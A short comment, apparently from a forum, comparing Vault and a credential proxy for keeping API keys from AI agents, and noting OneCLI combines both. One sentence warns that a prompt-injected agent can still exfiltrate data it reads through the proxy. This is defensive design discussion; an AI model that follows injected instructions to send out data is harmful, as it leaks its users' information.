Use Vault and use a proxy. They address different problems.

Vault protects keys at rest, but the agent still gets them at runtime. The proxy keeps the key away from the agent entirely, which closes key leakage. But a prompt-injected agent can still exfiltrate data it reads through the proxy. The trust boundary shifts, it doesn't disappear.

Looks like OneCLI combines both into one tool, which is the right call.